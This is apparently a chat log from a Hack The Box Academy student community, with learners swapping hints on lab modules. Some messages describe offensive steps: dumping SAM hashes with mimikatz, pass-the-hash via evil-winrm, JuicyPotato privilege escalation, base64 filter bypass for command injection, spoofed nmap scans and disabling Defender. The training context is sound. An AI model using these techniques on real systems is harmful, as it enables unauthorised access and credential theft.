do you see my error

IM SO DONE

Take a look at the article in the reading to get an idea of what to look for. Esentially you want to look at Kerberos packets, and find a pattern resembling the pattern you see in the rule

LITERAL 2 HEAD MOMENT

anyone did this is malware analysis module?

when ever i change the instruction and run, it keeps changing back to original

OKAY this section was fun ngl

seeing what i could do with some simple hashes and such.

still cant believe i 2headed that flag

did you save after changing the instructions?

at least that's my initial thought ¯_(ツ)_/¯

do i have to? how

Is anyone else's vm not spawning

i mean if you have to do any code editing

it won't update unless you save, even in a debugger you have to save before your run it

hmm lemme try i dont remember seeing an save option

idk there is no option to save

i guess i have to set breakpoints before it and change all of it everytime :(

doing with htb laggy rdp is just pure pain

Got it now, Thanks! I just need to calm down going through these modules. I just like to jump right into things lol

wft its just so confusing, i saved into a different file and its back to original still

Working on AD Enumeration & Attacks - Skills Assessment Part I. Can the answer to question 2 be found using the webshell or am I missing something in my enumeration step? I tried importing powershell modules and didnt have any luck so far.

dns is not working :(

you might want to get a REMnux VM

nah wait i'm bad this is for the debugging part isn't it

yes

this is killing me

i mean.. maybe it works? did you try capturing connections with inetsim?

it is not listening i saw using netstat

im gonna try with pwnbox

what hurts more than breakup is clicking and waiting for response on screen on this shitty rdp

it looks like it's working; it's just telling you the method is now deprecated, as it's giving you a PID

unless i'm just missing something

no i checked netstat all others were there except dns

Was about to say I see a pid

so the PID isn't there?

also are you sure you're not meant to launch this on the target machine?

or is this just part of the steps

i haven't done this module so idk

i see this in my nightmares now

just curious what returns when you do netstat -nap |grep :53

i applied all patches still it reached sandbox detected

at this rate imma just get the malware on my pc and let it destroy it

and to confirm, you did edit the inetsim config?

yes

htb rdp is unusable i giveup

hey is there a way to diff a two same looking source code,string etc like this in vscode

same same

Hey, whats up guys I'm new. I have a question i signed up for HTB Academy and I have cubes but I can't unlock any of the modules anyone had that issue before?

trying to trouble shoot this

how much cubes u have

says i have 60

and it was only 10 cubes for one of the ones i was trying to get

contact support chat

this at the right bottom of the htb

copy thanks i'll give that a go

Right mouse click on file and click on "select for compare". Right mouse click on other file and click on "compare with selected"

yeh but its very ugly with no color

i have color in mine....... your theme is lame?

i was doing wrong , now its showing color thx

can someone help me with the flag in Exploiting Web Vulnerabilities in Thick-Client Applications?

Hello, for "
Windows Privilege Escalation
Windows Privilege Escalation Skills Assessment - Part I ", to get privesc, I try JuicyPotato.exe via Metasploit but I have the error "COM -> recv failed with error: 10038". Do you know this problem ? With PrintSpoofer64.exe, the problem is "Operation failed or timed out.". Any tips ?

hey, can someone help me with the Firewall and IDS/IPS Evasion - Medium Lab in NETWORK ENUMERATION WITH NMAP module

sudo nmap target ip -sU -p 53 -Pn --script=dns-nsid

i tried this command, but iam olny getting output like:

Host is up.

PORT STATE SERVICE
53/tcp filtered domain

I ran your script and it worked on mine, maybe reset your target.

yeah bro

thanks bro it worked

You have to try different methods until one sticks. The machine appears secured against most methods taught in the module, but not all.

do you mean others methos about SeImpersonatePrivilege privesc ?

I mean throw spaghetti at the wall and see what sticks.

https://tenor.com/view/sigh-parks-and-rec-ron-swanson-ok-then-gif-10489321092402713937

I pay HTB academy for a month. Could I access the module that I complete it?

yes

I am new to htb and the whole scene of cybersec. Is it recommended that I complete all the fundamental modules provided before moving on? Or do you recommend something else? Thanks.

guys

my issue got solved

first i was having tun0 and tun1 configuration and then i only had tun0 configuration so the vpn worked and i was able to ping the targte machine

i just wanted to convey this so that it might help others as well and it would be a form of documentation and whatsoever so pls dont mind

guys i had one more doubt is it fine to use tor and proxychains together to stay anonymous or is it necessary to use a vpn like is vpn more reliable or proxychains + tor

pls do tell

Use tryhackme first then htb (I did same)

If you ask why

Htb is a little bit more advanced

Not so much but i recommend to have understanding of everything in thm so htb will be easier

Good advice

Just do pre security path and come to academy it finish Information security foundation skill path then start CPTS or CDSA whatever yo like

Guys you know when base 64 encoding bash commands for Command Injections module.

Is it necessary to url encode / within that base64 string to be?

Or is the base 64 enough to bypass the filter for /

The skills assessment is taking my soul

You don't need to URL encode the base64 string iirc

I threw about 5000 things at it before becoming systematic. I have commands running now so hopefully can sort this quickly from here

As you said, without b64

Got it

That was awesome but painful

there were a few ways you could get the flag for that skill assessment, you chose the hard way

^

Could have just use a simple obfuscation on the commands.

I think I did it the easy way in the end. Just I was sorta trying for the whole command at once instead of getting it working bit by bit

hello, just a question that has been intriguing me. In the nmap module it says that for IPS/IDS evasion we have to sometime specify a spoofed IP (-S) that is in the same subnet of the server for us to actually get a response back from the specified port. However, how does the server know how to route the traffic back to us if we spoof our IP and are on different subnets ?

Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got system on SQL01 and got the local admin hash so I can WINRM into SQL01 now. Used LaZagne, mimikatz, secretsdump, and manual search for things. I also have the creds of ms******. I have 2 users (AB*** and BR***) that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be appreciated. I’ve been doing these skills assessments for what feels like weeks now. Been reading and trying things and not having success

What privileges does the current user you are logged in as have?

@half stag so you already have the flag off SQL01 , then the way to get to MS01 is in bloodhound and users rights

i used blodhound didnt find anything intresting

the nothing 'interesting' may be interesting after all.

i should look for rights the user SQL01 has?

Honestly i got to MS01 first and had to backtrack to SQL01

I would take a look at what users/credentials (hashes) you may already have that have access to things.

what do you get from outbound control rights in BH?

Did you dumped the sam files?

no

Try that , you probably gonna find something juicy there

dump it using mimikatz?

You got system level on sql01, you should be able to access sam,system,security files

Or just try to secretsdump directly it may work , i personally dumped sam manually

any1 ?

(i ran bloodhound on the user sql01) even when setting it as the starting node i dont see the outbound control rights in node info

Thnx i would try

the problem was about a wrong CLSID. Thx for your help 😉

Can anyone help me with "During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer." in the "Rapid Triage Examination & Analysis Tools" module please? I've seen a couple hints in here but im still not getting it. I can see the Zone Identifier entry in mft.csv and can see in MFT-J.csv that it has been renamed but i cant find out the new name

ot the SAM file it has the hash for the local administrator, what could i do with it?

i also tried PTH for the 172.16.7.50

does it work? if it doesn't, try out the other hashes

i tried all of them

none of them worked

make sure you're running it against the whole subnet /24

nothing worked 😢

how did you get the hashes?

lsadump::sam

It should work, what did you use to pass the hash

Rdp wont work btw

evil-winrm

iirc administrator hash is not the way.

Its worked for me 🫨

from my notes, i got the admin hash and pth via evil-winrm

Then disabled that rdp restriction and logged in via rdp :v

Dm me the hash you found

you just need to add DisableRestrictedAdmin reg key with win-rm before using rdp.

Yes that’s what should be done

But about that ms01 administrator idk , i got his hash from sam files but iirc others said mimikatz works

Was my hash correct?

[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

any ideas?

Boxes are showing high ms Howard’s 100,000ms I am located in the east coast

Upwards

try it with /cert:ignore

Didn't work. Solved with /tls-seclevel:0 /timeout:80000. Long live google!

Anyone knows why I can’t chat in general

About sqlmap, does there is a way to know what his a type of SQLi before running the cmd xd? I mean, they are not going to tell us during the CBBH exam so we will have to test everything one by one or there is something to try to find the type and use the correct format with sqlmap.

hellog guys, regarding the nmap module: IDS/IPS evasion lab 1 (easy)
Im using this command : sudo nmap 10.129.2.28 -n -Pn -p445 -O -S 10.129.2.155 -e tun0 as it is the most relevant one based on the hint.
However nmap is throwing an error that theere is no route to the host.
Is it a bug ? because in the module this command worked . Or am I completely on the wrong track ?

Did you started your VPN from HTB Academy?

Does anyone know what we're supposed to do in the Authentication Bypass section of Whitebox Attacks did they just use some completely different hash in the target vs the provided code?

yes the im connected and can scan it perfectly

however I have to bypass the firewall so it gives me the OS info and the -S spoofed-ip -e tun0 is throwing an error others faced the same issue

am i on the right track ?

PIVOTING, TUNNELING, AND PORT FORWARDING

Issues with SocksOverRDP

On the host, I am trying to run the SocksOverRDP-Plugin.dll with the command given.

I am hitting an error telling me that the socks... file contains a virus or a program not wanted -
This is the file directly from the link provided in the module.
Can someone assist with this please?

do you mean outbound object control?

please help i am still stuck

Disable the defender if it is ON

It's not just defender, it's real-time protection

Anyone from htb can give a hint over the weekly streaks. I'm at 18 but I want to let it die... But I'd be saddened if htb rolls something out soon after that rewards something.

It's academy related, but i don't see a good channel, so I'm dropping it here for now

ATM there's no tangible reward for streaks

Just shiny badges

yup, but they keep hinting on that for a while now

Yeah, and they hinted at the cwee cert for like 6 months. It's likely they're deliberating on what the reward(s) should be

It's likely they're gathering some base analytical data before moving forward with implementing anything

My main thing is, I don't really have the time to do 3 sections every week, so I gotta burn some stuff every once in a while

You don't gotta do 3 sections every week

("properly do 3 sections, or 2 sections")

Answering a question counts as 1, and clicking the "complete and next" counts as 1

i wish the extra stuff you did carried over to the weeks ahead

Unless they very recently changed it

yup, but if I don't have time to answer a question, I gotta find 3 complete and next 😭

¯_(ツ)_/¯

Just do a fundamental module

haha, thanks for answering Marcie. It's been a while

Yes
Perfect answer
Thanks @fathom pendant for add-on

if someone know:

It's just fuck around and find out

I am currently stuck on the skill assessment of injection attacks, I found ||the internal service and the source code of the internal php but I'm not getting further now with the XPATHi, as far as I can see with my query 1+and+count(/*)=1 there is only the orders node and I have found no other orders except 1,2,3,4,5,6 & 1337 which don't seem to help too much, what obvious issue am I missing here? ||

if i understand correctly

this is an entirely different password than the one used 3 or so modules ago

nvm got it

It's not

realized that, i think that guy from yestrerday threw me off

Also sections

Not modules, sections refer to the individual parts of a module

oh yeah duh

Yay 😭

¯_(ツ)_/¯

That's what a fair bit of this field is

how would you go about getting the vhd for this situation

i havent attempted anything in this section yet, im just curious because isnt messing with local vhd's like admin only and such

what WOULD be the point of breaking BL if you are already ADMIN

Hey everyone, I am doing thoing the linux privilege assessment - skills assessment. I am on flag 4, I think I've found the user ||tomcatadm|| but I cannot for the life of me find a password

could anyone please help?

guys please help am crying
been 3 hours on this and still cant figure this out
so the question is the last from the INFORMATION GATHERING - WEB EDITION modlue in the Active Subdomain Enumeration section
Submit the number of all "A" records from all zones as the answer.
Hint : There are several zones.

You extract it from somewhere

You basically just transfer it from the victim to your system

it can be found in a backup share, or the permissions isn't configured properly and you can read it

nevermind

I think I found it

So how many zones have you found that you can use axfr on it?

so I did find creds but they dont work

i submitted every possible number but still wrong

What have you submitted?
In a prev question you already answered how many zones are on the nameserver. Now you just need to count all A ones.

can i send the result ?

What was the range of numbers you tried already?

i got 19

i used dig axfr

Yea thats a bit short of the correct number. I sadly am in a car and cant access my notes atm.

Is 19 only from one zone?

am having a problem understanding wut is zones

https://forum.hackthebox.com/t/academy-footprinting-dns/249570

there's another zone you can transfer to

maybe look within

i found this and tried all solutions

it's a combination of the base zone + another zone

like main domain and sub domain ?

yes

ohhhh

so from inalnefreight.htb AND another one you can transfer to

hint localhost might show domains you can use

performing the subdomain brute forcing would help

no need to bruteforce

just axfr ?

yes

dig axfr subdomain.inlanefreight.htb @ip

can i send an image of the result

nope

You already answred a question above that there exist more then one zone. And the current question is asking how many A records are in all the zones you can access.

also if it's not obvious replace "subdomain" with the actual valid domain you can transfer to

which you know about because you found the text records for it

if that's the only question you haven't answered

answered all